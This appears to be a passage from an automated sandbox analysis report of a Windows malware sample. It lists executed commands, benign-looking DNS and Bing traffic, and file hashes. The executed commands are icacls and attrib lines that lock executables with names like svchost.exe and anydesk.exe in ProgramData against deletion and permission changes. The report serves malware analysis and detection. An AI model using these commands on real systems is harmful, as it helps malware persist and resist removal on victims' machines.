C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat

MD5 71d06b71522b0ecd9e42ee36b73a8976
SHA1 5615791d6e861b721e9945d55a0946f4e51d0302
SHA256 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0
SHA512 f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84

memory/880-2-0x00007FFE70A13000-0x00007FFE70A15000-memory.dmp

memory/880-8-0x000001E129E20000-0x000001E129E42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k31353zv.nsi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/880-13-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp

memory/880-14-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp

memory/880-17-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d3235ed022a42ec4338123ab87144afa
SHA1 5058608bc0deb720a585a2304a8f7cf63a50a315
SHA256 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7e855de5861571374efc63dacc84638b
SHA1 54bc201ab83ab18ef4c8009b307ae7c6d041369e
SHA256 aaef6c1145f7994603ccc9477b801b498e77401e1a9e0e0e1e6a585c74fe7a2a
SHA512 db1e4028123b5991525d386d13b20011259e58db8cee4662714d6fe1b2ef48816f0fa2f8e36da3713a8aedb04cbaccf778aa4015cd2475b4371450cea73745bb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6317adf4fbc43ea2fd68861fafd57155
SHA1 6b87c718893c83c6eed2767e8d9cbc6443e31913
SHA256 c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af
SHA512 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 58b80fe8da7d23cd3c9707f4ce93457e
SHA1 7d1c58b992631d82cabd38d738ccca072c91c124
SHA256 4479db3e2faf952801a1506140f3612e267e9bb4f5d509b0d63204429de8eef3
SHA512 82ef5d29aaf46b5fef467185193f03612058c4bbd7b9926293a79c18deefe137811f95dc59feaa649376c8711ca3253177177b538d2d953147db1ed719cba5e8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1ff7c767b41e57bd6662b9b45b7e4331
SHA1 e484ee08429d6403c5beb97582f2bc88567d2d45
SHA256 c37e94da3e67f9473d2f0f51725c4246eefdbd2c01b3603d1b218842afc05048
SHA512 310cdae4625b1c391eab4adc7e139da6da6cbc2f8eda386ec6aa23da7967fe3dad6792ccd4bed0a0a320c466363051927ff376487080f77b50bf325098651483

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba169f4dcbbf147fe78ef0061a95e83b
SHA1 92a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA256 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA512 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

memory/1896-85-0x000002047D1D0000-0x000002047D3EC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c58a75389f1ab258652c47081e1ddb5a
SHA1 d95f18dd3174cd5452b278aa2c7e5394567e32a8
SHA256 3e2f43d6dbf3177dc0c46fce82fc23ec2d694f09cae9c44761b901bdf5f725bf
SHA512 b928fb48a51e56d2554584c9275f0fd70f1c751b725c7f054a8049268e6a31a2357cf9f77671f69fb5a781e0b12a70324ee844660fcfa5b4a3a44d74f12aee6a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da5c82b0e070047f7377042d08093ff4
SHA1 89d05987cd60828cca516c5c40c18935c35e8bd3
SHA256 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA512 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

memory/2084-108-0x0000012CFCA40000-0x0000012CFCC5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3996d8b0c44a2fdabdabbfaffda948c5
SHA1 30b099e2995c339c2a6abfa727258235feb817b6
SHA256 70b3dceb0039e84d5ab7fc7f5757ece6e6a6acb593eb0f95e979da80ec454101
SHA512 0fe9e6f96b4417d94c966d6e65f129520f3ccd3359e6e831e29b654f2d90ed09dec45947be94ed3e59109783d8e01ddf2035593609f2d8dc41104644ab107dd7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

memory/4444-153-0x000001CE2D410000-0x000001CE2D62C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1bcffb21fd74d59b3233b56b614eb133
SHA1 654c816ff08d2b47e574a8ac87c2e89d909f78eb
SHA256 96b1a17c2b8bf7d3e52466259d86310231885632e12a55ecdcb8b15b722725db
SHA512 c8dc82344f039010d0ddee4045d8e3752726c335c5dfadd2f8af316db89c27be892b762baad2ce0d2b4480f84b999e5ec174d0286d08c4000e3c106d7d506cfb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b2600662b39ee59512f530131c038b45
SHA1 c417eecbd7fd9c0f143261279c17cdc83783c95c
SHA256 b2cd3884c706629b0e92856ba2643c4062d98480d38a36e4ac10f6a6695ed8c2
SHA512 97bbb9a0859b3e01a5d789b5d242c07b35e8f80a7ccf7e2e9af1ff31cf0a3497cc23603754407140a7602bb1a3edd7ec71529a0b9a7460b700ebcd72306bd3af

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5c964bb22371323b8064895892ab211e
SHA1 a23e9564b96d7a3e8b4a90abd0c7993d87e314fe
SHA256 80229da91bb7b07ea68d18e5a89a54988520c314030b252bd0e14584bbb0669f
SHA512 dd32dc25e1150fe04d0dde6677d3a555cd7c0428faf2ad071e4bb7e434c808c6c17186e55867330f78f528009b74e511644f1278815551c3e19b37532151f1c8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7511c81925750deb7ad1b9b80eea8a8d
SHA1 6ea759b3cbd243ae11435c6d6c5ced185eb01f49
SHA256 5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa
SHA512 5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b